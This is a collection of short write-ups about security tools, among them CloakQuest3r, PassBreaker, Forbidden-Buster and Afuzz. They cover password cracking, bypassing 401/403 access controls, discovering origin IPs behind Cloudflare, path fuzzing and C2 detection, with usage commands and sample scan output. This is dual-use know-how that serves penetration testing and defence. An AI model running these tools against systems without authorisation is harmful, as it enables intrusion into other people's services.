
CloakQuest3r - Uncover The True IP Address Of Websites Safeguarded By Cloudflare

By: Zion3R


CloakQuest3r is a Python tool crafted to uncover the true IP address of websites safeguarded by Cloudflare, a widely adopted web security and performance service. It works by discerning the actual IP address of web servers concealed behind Cloudflare's protective shield, with subdomain scanning as a key technique. The tool is a valuable resource for penetration testers, security professionals, and web administrators seeking to perform comprehensive security assessments and identify vulnerabilities that may be obscured by Cloudflare's security measures.


Key Features:

  • Real IP Detection: CloakQuest3r excels in the art of discovering the real IP address of web servers employing Cloudflare's services. This crucial information is paramount for conducting comprehensive penetration tests and ensuring the security of web assets.

  • Subdomain Scanning: Subdomain scanning is harnessed as a fundamental component in the process of finding the real IP address. It aids in the identification of the actual server responsible for hosting the website and its associated subdomains.

  • Threaded Scanning: To enhance efficiency and expedite the real IP detection process, CloakQuest3r utilizes threading. This feature enables scanning of a substantial list of subdomains without significantly extending the execution time.

  • Detailed Reporting: The tool provides comprehensive output, including the total number of subdomains scanned, the total number of subdomains found, and the time taken for the scan. Any real IP addresses unveiled during the process are also presented, facilitating in-depth analysis and penetration testing.

With CloakQuest3r, you can confidently evaluate website security, unveil hidden vulnerabilities, and secure your web assets by disclosing the true IP address concealed behind Cloudflare's protective layers.
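To make the underlying technique concrete, here is a minimal, hypothetical sketch (not CloakQuest3r's actual code) of threaded subdomain resolution that flags hosts answering from outside a few of Cloudflare's published IP ranges. The subdomain list and the CIDR list are abbreviated examples only, and any hit is just a candidate that still needs manual verification.

# Illustrative sketch only: resolve candidate subdomains in parallel and flag
# any that answer from outside Cloudflare's ranges (partial CIDR list).
import socket
import ipaddress
from concurrent.futures import ThreadPoolExecutor

CLOUDFLARE_RANGES = [ipaddress.ip_network(c) for c in (
    "104.16.0.0/13", "172.64.0.0/13", "173.245.48.0/20", "108.162.192.0/18",
    "141.101.64.0/18", "162.158.0.0/15", "198.41.128.0/17", "131.0.72.0/22",
)]

def resolve(host):
    try:
        return host, socket.gethostbyname(host)
    except socket.gaierror:
        return host, None

def find_candidate_ips(domain, subdomains, workers=50):
    hosts = [f"{sub}.{domain}" for sub in subdomains]
    leaks = {}
    with ThreadPoolExecutor(max_workers=workers) as pool:
        for host, ip in pool.map(resolve, hosts):
            if ip and not any(ipaddress.ip_address(ip) in net for net in CLOUDFLARE_RANGES):
                leaks[host] = ip  # resolves outside Cloudflare: possible origin IP
    return leaks

print(find_candidate_ips("example.com", ["www", "mail", "ftp", "dev", "staging"]))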

Limitation

- Still in the development phase; sometimes it can't detect the real IP.

- CloakQuest3r combines multiple indicators to uncover real IP addresses behind Cloudflare. While subdomain scanning is a part of the process, we do not assume that all subdomains' A records point to the target host. The tool is designed to provide valuable insights but may not work in every scenario. We welcome any specific suggestions for improvement.

1. False Negatives: CloakQuest3r may not always accurately identify the real IP address behind Cloudflare, particularly for websites with complex network configurations or strict security measures.

2. Dynamic Environments: Websites' infrastructure and configurations can change over time. The tool may not capture these changes, potentially leading to outdated information.

3. Subdomain Variation: While the tool scans subdomains, it doesn't guarantee that all subdomains' A records will point to the primary host. Some subdomains may also be protected by Cloudflare.

This tool is a Proof of Concept and is for Educational Purposes Only.

How to Use:

  1. Run CloakQuest3r with a single command-line argument: the target domain you want to analyze.

     git clone https://github.com/spyboy-productions/CloakQuest3r.git
     cd CloakQuest3r
     pip3 install -r requirements.txt
     python cloakquest3r.py example.com
  2. The tool will check if the website is using Cloudflare. If not, it will inform you that subdomain scanning is unnecessary.

  3. If Cloudflare is detected, CloakQuest3r will scan for subdomains and identify their real IP addresses.

  4. You will receive detailed output, including the number of subdomains scanned, the total number of subdomains found, and the time taken for the scan.

  5. Any real IP addresses found will be displayed, allowing you to conduct further analysis and penetration testing.

CloakQuest3r simplifies the process of assessing website security by providing a clear, organized, and informative report. Use it to enhance your security assessments, identify potential vulnerabilities, and secure your web assets.

Run It Online:

Run it online on replit.com: https://replit.com/@spyb0y/CloakQuest3r



PassBreaker - Command-line Password Cracking Tool Developed In Python

By: Zion3R


PassBreaker is a command-line password cracking tool developed in Python. It allows you to perform various password cracking techniques such as wordlist-based attacks and brute force attacks. 

Features

  • Wordlist-based password cracking
  • Brute force password cracking
  • Support for multiple hash algorithms
  • Optional salt value
  • Parallel processing option for faster cracking
  • Password complexity evaluation
  • Customizable minimum and maximum password length
  • Customizable character set for brute force attacks

Installation

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/PassBreaker.git
  2. Install the required dependencies:

    pip install -r requirements.txt

Usage

python passbreaker.py <password_hash> <wordlist_file> [--algorithm]

Replace <password_hash> with the target password hash and <wordlist_file> with the path to the wordlist file containing potential passwords.
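For intuition, the core loop of a wordlist attack can be sketched as below. This is a simplified illustration rather than PassBreaker's actual implementation, and appending the optional salt to each candidate is an assumption made here for demonstration.

# Simplified wordlist attack (illustrative, not PassBreaker's code).
import hashlib

def crack_with_wordlist(target_hash, wordlist_file, algorithm="md5", salt=""):
    with open(wordlist_file, "r", encoding="utf-8", errors="ignore") as f:
        for line in f:
            candidate = line.strip()
            # how the salt is combined is an assumption for this sketch
            digest = hashlib.new(algorithm, (candidate + salt).encode()).hexdigest()
            if digest == target_hash.lower():
                return candidate
    return None

# "password" hashes to 5f4dcc3b5aa765d61d8327deb882cf99 under MD5
print(crack_with_wordlist("5f4dcc3b5aa765d61d8327deb882cf99", "passwords.txt"))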

Options

  • --algorithm <algorithm>: Specify the hash algorithm to use (e.g., md5, sha256, sha512).
  • -s, --salt <salt>: Specify a salt value to use.
  • -p, --parallel: Enable parallel processing for faster cracking.
  • -c, --complexity: Evaluate password complexity before cracking.
  • -b, --brute-force: Perform a brute force attack.
  • --min-length <min_length>: Set the minimum password length for brute force attacks.
  • --max-length <max_length>: Set the maximum password length for brute force attacks.
  • --character-set <character_set>: Set the character set to use for brute force attacks.

Here are some more usage examples, each with a brief explanation:

Usage Examples

Wordlist-based Password Cracking

python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5

This command attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the MD5 algorithm and a wordlist from the "passwords.txt" file.

Brute Force Attack

python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 --brute-force --min-length 6 --max-length 8 --character-set abc123

This command performs a brute force attack to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" by trying all possible combinations of passwords with a length between 6 and 8 characters, using the character set "abc123".

Password Complexity Evaluation

python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha256 --complexity

This command evaluates the complexity of passwords in the "passwords.txt" file and attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the SHA-256 algorithm. It only tries passwords that meet the complexity requirements.

Using Salt Value

python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5 --salt mysalt123

This command uses a specific salt value ("mysalt123") for the password cracking process. Salt is used to enhance the security of passwords.

Parallel Processing

python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha512 --parallel

This command performs password cracking with parallel processing for faster cracking. It utilizes multiple processing cores, but it may consume more system resources.

These examples demonstrate different features and use cases of the "PassBreaker" password cracking tool. Users can customize the parameters based on their needs and goals.

Disclaimer

This tool is intended for educational and ethical purposes only. Misuse of this tool for any malicious activities is strictly prohibited. The developers assume no liability and are not responsible for any misuse or damage caused by this tool.

Contributing

Contributions are welcome! To contribute to PassBreaker, follow these steps:

  1. Fork the repository.
  2. Create a new branch for your feature or bug fix.
  3. Make your changes and commit them.
  4. Push your changes to your forked repository.
  5. Open a pull request in the main repository.

Contact

If you have any questions, comments, or suggestions about PassBreaker, please feel free to contact me:

License

PassBreaker is released under the MIT License. See LICENSE for more information.



C2-Search-Netlas - Search For C2 Servers Based On Netlas

By: Zion3R

C2 Search Netlas is a Java utility designed to detect Command and Control (C2) servers using the Netlas API. It provides a straightforward and user-friendly CLI interface for searching C2 servers, leveraging the Netlas API to gather data and process it locally.



Usage

To utilize this terminal utility, you'll need a Netlas API key. Obtain your key from the Netlas website.

After acquiring your API key, execute the following command to search servers:

c2detect -t <TARGET_DOMAIN> -p <TARGET_PORT> -s <API_KEY> [-v]

Replace <TARGET_DOMAIN> with the desired IP address or domain, <TARGET_PORT> with the port you wish to scan, and <API_KEY> with your Netlas API key. Use the optional -v flag for verbose output. For example, to scan google.com on port 443 with the Netlas API key 1234567890abcdef, enter:

c2detect -t google.com -p 443 -s 1234567890abcdef

Release

To download a release of the utility, follow these steps:

  • Visit the repository's releases page on GitHub.
  • Download the latest release file (typically a JAR file) to your local machine.
  • In a terminal, navigate to the directory containing the JAR file.
  • Execute the following command to initiate the utility:
java -jar c2-search-netlas-<version>.jar -t <ip-or-domain> -p <port> -s <your-netlas-api-key>

Docker

To build and start the Docker container for this project, run the following commands:

docker build -t c2detect .
docker run -it --rm \
c2detect \
-s "your_api_key" \
-t "your_target_domain" \
-p "your_target_port" \
-v

Source

To use this utility, you need to have a Netlas API key. You can get the key from the Netlas website. Now you can build the project and run it using the following commands:

./gradlew build
java -jar app/build/libs/c2-search-netlas-1.0-SNAPSHOT.jar --help

This will display the help message with available options. To search for C2 servers, run the following command:

java -jar app/build/libs/c2-search-netlas-1.0-SNAPSHOT.jar -t <ip-or-domain> -p <port> -s <your-netlas-api-key>

This will display a list of C2 servers found in the given IP address or domain.

Support

Name Support
Metasploit
Havoc
Cobalt Strike
Bruteratel
Sliver
DeimosC2
PhoenixC2
Empire
Merlin
Covenant
Villain
Shad0w
PoshC2

Legend:

  • ✅ - Accept/good support
  • ❓ - Support unknown/unclear
  • ❌ - No support/poor support

Contributing

If you'd like to contribute to this project, please feel free to create a pull request.

License

This project is licensed under the terms in the LICENSE file - see that file for details.




ICS-Forensics-Tools - Microsoft ICS Forensics Framework

By: Zion3R


Microsoft ICS Forensics Tools is an open-source forensic framework for analyzing industrial PLC metadata and project files.
It enables investigators to identify suspicious artifacts in ICS environments and detect compromised devices during incident response or manual checks.
Because the framework is open source, investigators can verify the actions of the tool or customize it to specific needs.


Getting Started

These instructions will get you a copy of the project up and running on your local machine for development and testing purposes.

git clone https://github.com/microsoft/ics-forensics-tools.git

Prerequisites

Installing

  • Install python requirements

    pip install -r requirements.txt

Usage

General application arguments:

Args               | Description                                                         | Required / Optional
-h, --help         | show this help message and exit                                     | Optional
-s, --save-config  | Save config file for easy future usage                              | Optional
-c, --config       | Config file path, default is config.json                            | Optional
-o, --output-dir   | Directory in which to output any generated files, default is output | Optional
-v, --verbose      | Log output to a file as well as the console                         | Optional
-p, --multiprocess | Run in multiprocess mode by number of plugins/analyzers             | Optional

Specific plugin arguments:

Args        | Description                                                                                                                                    | Required / Optional
-h, --help  | show this help message and exit                                                                                                                | Optional
--ip        | Addresses file path, CIDR or IP addresses CSV (ip column required); add more columns for additional info about each IP (username, pass, etc.) | Required
--port      | Port number                                                                                                                                    | Optional
--transport | tcp/udp                                                                                                                                        | Optional
--analyzer  | Analyzer name to run                                                                                                                           | Optional

Executing examples in the command line

python driver.py -s -v PluginName --ip ips.csv
python driver.py -s -v PluginName --analyzer AnalyzerName
python driver.py -s -v -c config.json --multiprocess

Import as library example

from forensic.client.forensic_client import ForensicClient
from forensic.interfaces.plugin import PluginConfig

forensic = ForensicClient()
plugin = PluginConfig.from_json({
    "name": "PluginName",
    "port": 123,
    "transport": "tcp",
    "addresses": [{"ip": "192.168.1.0/24"}, {"ip": "10.10.10.10"}],
    "parameters": {},
    "analyzers": []
})
forensic.scan([plugin])

Architecture

Adding Plugins

When developing locally make sure to mark src folder as "Sources root"

  • Create new directory under plugins folder with your plugin name
  • Create new Python file with your plugin name
  • Use the following template to write your plugin and replace 'General' with your plugin name
from pathlib import Path
from forensic.interfaces.plugin import PluginInterface, PluginConfig, PluginCLI
from forensic.common.constants.constants import Transport


class GeneralCLI(PluginCLI):
    def __init__(self, folder_name):
        super().__init__(folder_name)
        self.name = "General"
        self.description = "General Plugin Description"
        self.port = 123
        self.transport = Transport.TCP

    def flags(self, parser):
        self.base_flags(parser, self.port, self.transport)
        parser.add_argument('--general', help='General additional argument', metavar="")


class General(PluginInterface):
    def __init__(self, config: PluginConfig, output_dir: Path, verbose: bool):
        super().__init__(config, output_dir, verbose)

    def connect(self, address):
        self.logger.info(f"{self.config.name} connect")

    def export(self, extracted):
        self.logger.info(f"{self.config.name} export")
  • Make sure to import your new plugin in the __init__.py file under the plugins folder.
  • The PluginInterface subclass receives a 'config' parameter; you can use it to access any data available in the PluginConfig object (plugin name, addresses, port, transport, parameters).
    There are two mandatory functions (connect, export).
    The connect function receives a single IP address, extracts any relevant information from the device, and returns it.
    The export function receives the information that was extracted from all the devices and exports it to a file.
  • In the PluginCLI subclass you specify, in the init function, the default information related to this plugin.
    There is a single mandatory function (flags), in which you must call base_flags; you can add any additional flags that you want to have.

Adding Analyzers

  • Create a new directory under the analyzers folder, named after the plugin your analyzer relates to.
  • Create a new Python file with your analyzer name.
  • Use the following template to write your analyzer and replace 'General' with your analyzer name:
from pathlib import Path
from forensic.interfaces.analyzer import AnalyzerInterface, AnalyzerConfig


class General(AnalyzerInterface):
    def __init__(self, config: AnalyzerConfig, output_dir: Path, verbose: bool):
        super().__init__(config, output_dir, verbose)
        self.plugin_name = 'General'
        self.create_output_dir(self.plugin_name)

    def analyze(self):
        pass
  • Make sure to import your new analyzer in the __init__.py file under the analyzers folder

Resources and technical data:

Microsoft Defender for IoT is an agentless network-layer security solution that allows organizations to continuously monitor and discover assets, detect threats, and manage vulnerabilities in their IoT/OT and Industrial Control Systems (ICS) devices, on-premises and in Azure-connected environments.

Section 52 under MSRC blog
ICS Lecture given about the tool
Section 52 - Investigating Malicious Ladder Logic | Microsoft Defender for IoT Webinar - YouTube

Contributing

This project welcomes contributions and suggestions. Most contributions require you to agree to a Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us the rights to use your contribution. For details, visit https://cla.opensource.microsoft.com.

When you submit a pull request, a CLA bot will automatically determine whether you need to provide a CLA and decorate the PR appropriately (e.g., status check, comment). Simply follow the instructions provided by the bot. You will only need to do this once across all repos using our CLA.

This project has adopted the Microsoft Open Source Code of Conduct. For more information see the Code of Conduct FAQ or contact opencode@microsoft.com with any additional questions or comments.

Trademarks

This project may contain trademarks or logos for projects, products, or services. Authorized use of Microsoft trademarks or logos is subject to and must follow Microsoft's Trademark & Brand Guidelines. Use of Microsoft trademarks or logos in modified versions of this project must not cause confusion or imply Microsoft sponsorship. Any use of third-party trademarks or logos is subject to those third parties' policies.



Forbidden-Buster - A Tool Designed To Automate Various Techniques In Order To Bypass HTTP 401 And 403 Response Codes And Gain Access To Unauthorized Areas In The System

By: Zion3R


Forbidden Buster is a tool designed to automate various techniques in order to bypass HTTP 401 and 403 response codes and gain access to unauthorized areas in the system. This code is made for security enthusiasts and professionals only. Use it at your own risk.

  • Probes HTTP 401 and 403 response codes to discover potential bypass techniques.
  • Utilizes various methods and headers to test and bypass access controls.
  • Customizable through command-line arguments.

Install requirements

pip3 install -r requirements.txt

Run the script

python3 forbidden_buster.py -u http://example.com

Forbidden Buster accepts the following arguments:

  -h, --help            show this help message and exit
  -u URL, --url URL     Full path to be used
  -m METHOD, --method METHOD
                        Method to be used. Default is GET
  -H HEADER, --header HEADER
                        Add a custom header
  -d DATA, --data DATA  Add data to request body. JSON is supported with escaping
  -p PROXY, --proxy PROXY
                        Use Proxy
  --rate-limit RATE_LIMIT
                        Rate limit (calls per second)
  --include-unicode     Include Unicode fuzzing (stressful)
  --include-user-agent  Include User-Agent fuzzing (stressful)

Example Usage:

python3 forbidden_buster.py --url "http://example.com/secret" --method POST --header "Authorization: Bearer XXX" --data '{\"key\":\"value\"}' --proxy "http://proxy.example.com" --rate-limit 5 --include-unicode --include-user-agent
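For intuition, the header-based probing that Forbidden Buster automates looks roughly like the sketch below. The header list is a small illustrative sample (this is not the tool's actual code), and a status change from 401/403 to 200 only marks a candidate for manual review.

# Illustrative sketch of header-based 401/403 probing (not the tool's code).
import requests

BYPASS_HEADERS = [
    {"X-Forwarded-For": "127.0.0.1"},
    {"X-Original-URL": "/secret"},
    {"X-Rewrite-URL": "/secret"},
    {"X-Custom-IP-Authorization": "127.0.0.1"},
]

def probe(url):
    baseline = requests.get(url, timeout=10)
    print(f"baseline -> {baseline.status_code}")
    for headers in BYPASS_HEADERS:
        resp = requests.get(url, headers=headers, timeout=10)
        print(f"{headers} -> {resp.status_code} ({len(resp.content)} bytes)")

probe("http://example.com/secret")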

  • Hacktricks - Special thanks for providing valuable techniques and insights used in this tool.
  • SecLists - Credit to danielmiessler's SecLists for providing the wordlists.
  • kaimi - Credit to kaimi's "Possible IP Bypass HTTP Headers" wordlist.


CryptoChat - Beyond Secure Messaging

By: Zion3R


Welcome to CryptChat - where conversations remain truly private. Built on the robust Python ecosystem, our application ensures that every word you send is wrapped in layers of encryption. Whether you're discussing sensitive business details or sharing personal stories, CryptChat provides the sanctuary you need in the digital age. Dive in, and experience the next level of secure messaging!

  1. End-to-End Encryption: Every message is secured from sender to receiver, ensuring utmost privacy.
  2. User-Friendly Interface: Navigating and messaging is intuitive and simple, making secure conversations a breeze.
  3. Robust Backend: Built on the powerful Python ecosystem, our chat is reliable and fast.
  4. Open Source: Dive into our codebase, contribute, and make it even better for everyone.
  5. Multimedia Support: Not just text - send encrypted images, videos, and files with ease.
  6. Group Chats: Have encrypted conversations with multiple people at once.

  • Python 3.x
  • cryptography
  • colorama

  1. Clone the repository:

    git clone https://github.com/HalilDeniz/CryptoChat.git
  2. Navigate to the project directory:

    cd CryptoChat
  3. Install the required dependencies:

    pip install -r requirements.txt

$ python3 server.py --help
usage: server.py [-h] [--host HOST] [--port PORT]

Start the chat server.

options:
-h, --help show this help message and exit
--host HOST The IP address to bind the server to.
--port PORT The port number to bind the server to.
--------------------------------------------------------------------------
$ python3 client.py --help
usage: client.py [-h] [--host HOST] [--port PORT]

Connect to the chat server.

options:
-h, --help show this help message and exit
--host HOST The server's IP address.
--port PORT The port number of the server.

$ python3 serverE.py --help
usage: serverE.py [-h] [--host HOST] [--port PORT] [--key KEY]

Start the chat server.

options:
-h, --help show this help message and exit
--host HOST The IP address to bind the server to. (Default=0.0.0.0)
--port PORT The port number to bind the server to. (Default=12345)
--key KEY The secret key for encryption. (Default=mysecretpassword)
--------------------------------------------------------------------------
$ python3 clientE.py --help
usage: clientE.py [-h] [--host HOST] [--port PORT] [--key KEY]

Connect to the chat server.

options:
-h, --help show this help message and exit
--host HOST The IP address to bind the server to. (Default=127.0.0.1)
--port PORT The port number to bind the server to. (Default=12345)
--key KEY The secret key for encryption. (Default=mysecretpassword)
  • --help: show this help message and exit
  • --host: The IP address to bind the server.
  • --port: The port number to bind the server.
  • --key : The secret key for encryption
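As a rough illustration of how a shared --key can drive symmetric encryption with the cryptography package, consider the minimal sketch below. CryptChat's real key derivation and wire format may differ; the SHA-256 based key derivation here is an assumption for demonstration only.

# Illustrative only: derive a Fernet key from the shared secret and encrypt a message.
import base64
import hashlib
from cryptography.fernet import Fernet

def fernet_from_password(password: str) -> Fernet:
    digest = hashlib.sha256(password.encode()).digest()  # assumption: simple hash, not a real KDF
    return Fernet(base64.urlsafe_b64encode(digest))

f = fernet_from_password("mysecretpassword")
token = f.encrypt(b"hello over the wire")
print(f.decrypt(token))  # b'hello over the wire'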

Contributions are welcome! If you find any issues or have suggestions for improvements, feel free to open an issue or submit a pull request.

If you have any questions, comments, or suggestions about CryptChat, please feel free to contact me:



Afuzz - Automated Web Path Fuzzing Tool For The Bug Bounty Projects

By: Zion3R

Afuzz is an automated web path fuzzing tool for the Bug Bounty projects.

Afuzz is being actively developed by @rapiddns


Features

  • Automatically detects the development language used by the website and generates extensions accordingly
  • Uses a blacklist to filter invalid pages
  • Uses a whitelist to find content in the page that bug bounty hunters are interested in
  • Filters random content in the page
  • Judges 404 error pages in multiple ways
  • Performs statistical analysis on the results after scanning to obtain the final result
  • Supports HTTP/2

Installation

git clone https://github.com/rapiddns/Afuzz.git
cd Afuzz
python setup.py install

OR

pip install afuzz

Run

afuzz -u http://testphp.vulnweb.com -t 30

Result

Table

+---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| http://testphp.vulnweb.com/ |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+
| target | path | status | redirect | title | length | content-type | lines | words | type | mark |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+
| http://testphp.vulnweb.com/ | .idea/workspace.xml | 200 | | | 12437 | text/xml | 217 | 774 | check | |
| http://testphp.vulnweb.com/ | admin | 301 | http://testphp.vulnweb.com/admin/ | 301 Moved Permanently | 169 | text/html | 8 | 11 | folder | 30x |
| http://testphp.vulnweb.com/ | login.php | 200 | | login page | 5009 | text/html | 120 | 432 | check | |
| http://testphp.vulnweb.com/ | .idea/.name | 200 | | | 6 | application/octet-stream | 1 | 1 | check | |
| http://testphp.vulnweb.com/ | .idea/vcs.xml | 200 | | | 173 | text/xml | 8 | 13 | check | |
| http://testphp.vulnweb.com/ | .idea/ | 200 | | Index of /.idea/ | 937 | text/html | 14 | 46 | whitelist | index of |
| http://testphp.vulnweb.com/ | cgi-bin/ | 403 | | 403 Forbidden | 276 | text/html | 10 | 28 | folder | 403 |
| http://testphp.vulnweb.com/ | .idea/encodings.xml | 200 | | | 171 | text/xml | 6 | 11 | check | |
| http://testphp.vulnweb.com/ | search.php | 200 | | search | 4218 | text/html | 104 | 364 | check | |
| http://testphp.vulnweb.com/ | product.php | 200 | | picture details | 4576 | text/html | 111 | 377 | check | |
| http://testphp.vulnweb.com/ | admin/ | 200 | | Index of /admin/ | 248 | text/html | 8 | 16 | whitelist | index of |
| http://testphp.vulnweb.com/ | .idea | 301 | http://testphp.vulnweb.com/.idea/ | 301 Moved Permanently | 169 | text/html | 8 | 11 | folder | 30x |
+-----------------------------+---------------------+--------+-----------------------------------+-----------------------+--------+--------------------------+-------+-------+-----------+----------+

Json

{
"result": [
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/workspace.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 12437,
"content_type": "text/xml",
"lines": 217,
"words": 774,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/workspace.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "admin",
"status": 301,
"redirect": "http://testphp.vulnweb.com/admin/",
"title": "301 Moved Permanently",
"length": 169,
"content_type": "text/html",
"lines": 8,
"words": 11,
"type": "folder",
"mark": "30x",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/admin"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "login.php",
"status": 200,
"redirect": "",
"title": "login page",
"length": 5009,
"content_type": "text/html",
"lines": 120,
"words": 432,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/login.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/.name",
"status": 200,
"redirect": "",
"title": "",
"length": 6,
"content_type": "application/octet-stream",
"lines": 1,
"words": 1,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/.name"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/vcs.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 173,
"content_type": "text/xml",
"lines": 8,
"words": 13,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/vcs.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/",
"status": 200,
"redirect": "",
"title": "Index of /.idea/",
"length": 937,
"content_type": "text/html",
"lines": 14,
"words": 46,
"type": "whitelist",
"mark": "index of",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "cgi-bin/",
"status": 403,
"redirect": "",
"title": "403 Forbidden",
"length": 276,
"content_type": "text/html",
"lines": 10,
"words": 28,
"type": "folder",
"mark": "403",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/cgi-bin/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea/encodings.xml",
"status": 200,
"redirect": "",
"title": "",
"length": 171,
"content_type": "text/xml",
"lines": 6,
"words": 11,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea/encodings.xml"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "search.php",
"status": 200,
"redirect": "",
"title": "search",
"length": 4218,
"content_type": "text/html",
"lines": 104,
"words": 364,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/search.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "product.php",
"status": 200,
"redirect": "",
"title": "picture details",
"length": 4576,
"content_type": "text/html",
"lines": 111,
"words": 377,
"type": "check",
"mark": "",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/product.php"
},
{
"target": "http://testphp.vulnweb.com/",
"path": "admin/",
"status": 200,
"redirect": "",
"title": "Index of /admin/",
"length": 248,
"content_type": "text/html",
"lines": 8,
"words": 16,
"type": "whitelist",
"mark": "index of",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/admin/"
},
{
"target": "http://testphp.vulnweb.com/",
"path": ".idea",
"status": 301,
"redirect": "http://testphp.vulnweb.com/.idea/",
"title": "301 Moved Permanently",
"length": 169,
"content_type": "text/html",
"lines": 8,
"words": 11,
"type": "folder",
"mark": "30x",
"subdomain": "testphp.vulnweb.com",
"depth": 0,
"url": "http://testphp.vulnweb.com/.idea"
}
],
"total": 12,
"target": "http://testphp.vulnweb.com/"
}

Wordlists (IMPORTANT)

Summary:

  • A wordlist is a text file; each line is a path.
  • For extensions, Afuzz replaces the %EXT% keyword with the extensions passed via the -e flag. If -e is not given, a default list is used.
  • Afuzz also generates dictionary entries based on the domain name: it replaces %subdomain% with the host, %rootdomain% with the root domain, %sub% with the subdomain, and %domain% with the domain, and applies %ext% to the result.

Examples:

  • Normal extensions
index.%EXT%

Passing asp and aspx extensions will generate the following dictionary:

index
index.asp
index.aspx
  • host
%subdomain%.%ext%
%sub%.bak
%domain%.zip
%rootdomain%.zip

Passing https://test-www.hackerone.com and the php extension will generate the following dictionary:

test-www.hackerone.com.php
test-www.zip
test.zip
www.zip
testwww.zip
hackerone.zip
hackerone.com.zip
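A rough sketch of this placeholder substitution is shown below. The hostname splitting is deliberately simplified and Afuzz's own generation rules differ in detail (for example, it derives several host variants such as test, www, and testwww from the subdomain), so treat this purely as an illustration.

# Illustrative placeholder expansion (simplified; not Afuzz's actual rules).
from urllib.parse import urlparse

def expand(line, url, extensions):
    host = urlparse(url).hostname          # test-www.hackerone.com
    parts = host.split(".")
    sub = parts[0]                         # test-www (simplified)
    rootdomain = ".".join(parts[-2:])      # hackerone.com
    domain = parts[-2]                     # hackerone
    out = set()
    for ext in extensions:
        entry = (line.replace("%subdomain%", host)
                     .replace("%rootdomain%", rootdomain)
                     .replace("%sub%", sub)
                     .replace("%domain%", domain))
        out.add(entry.replace("%EXT%", ext).replace("%ext%", ext))
    return sorted(out)

for line in ["index.%EXT%", "%subdomain%.%ext%", "%sub%.bak", "%domain%.zip"]:
    print(expand(line, "https://test-www.hackerone.com", ["php"]))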

Options




usage: afuzz [options]

An Automated Web Path Fuzzing Tool.
By RapidDNS (https://rapiddns.io)

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Target URL
  -o OUTPUT, --output OUTPUT
                        Output file
  -e EXTENSIONS, --extensions EXTENSIONS
                        Extension list separated by commas (Example: php,aspx,jsp)
  -t THREAD, --thread THREAD
                        Number of threads
  -d DEPTH, --depth DEPTH
                        Maximum recursion depth
  -w WORDLIST, --wordlist WORDLIST
                        Wordlist
  -f, --fullpath        Full path
  -p PROXY, --proxy PROXY
                        Proxy (ex: http://127.0.0.1:8080)

How to use

Some examples for how to use Afuzz - those are the most common arguments. If you need all, just use the -h argument.

Simple usage

afuzz -u https://target
afuzz -e php,html,js,json -u https://target
afuzz -e php,html,js -u https://target -d 3

Threads

The thread number (-t | --thread) reflects the number of separate brute-force processes, so the bigger the thread number, the faster Afuzz runs. By default, the number of threads is 10, but you can increase it if you want to speed up the progress.

In spite of that, the speed still depends a lot on the response time of the server. As a warning, we advise you to keep the thread count moderate, because a very high value can effectively DoS the target.

afuzz -e aspx,jsp,php,htm,js,bak,zip,txt,xml -u https://target -t 50

Blacklist

The blacklist.txt and bad_string.txt files in the /db directory are blacklists, which can filter some pages

The blacklist.txt file is the same as dirsearch.

The bad_string.txt file is a text file with one rule per line. The format is position==content, with == as the separator; position can be one of: header, body, regex, title.

Language detection

The language.txt file holds the language-detection rules; its format is the same as bad_string.txt. It is used to detect the development language of the website.
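As an illustration, rules in this position==content format could be parsed and applied roughly as below. The matching semantics are an assumption made for the sketch, not Afuzz's exact logic.

# Illustrative parser for position==content rules (assumed semantics).
import re

def load_rules(path):
    rules = []
    with open(path, encoding="utf-8", errors="ignore") as f:
        for line in f:
            line = line.strip()
            if line and "==" in line:
                position, content = line.split("==", 1)
                rules.append((position, content))
    return rules

def matches(rules, headers, body, title):
    for position, content in rules:
        if position == "header" and any(content in v for v in headers.values()):
            return True
        if position == "title" and content in title:
            return True
        if position == "body" and content in body:
            return True
        if position == "regex" and re.search(content, body):
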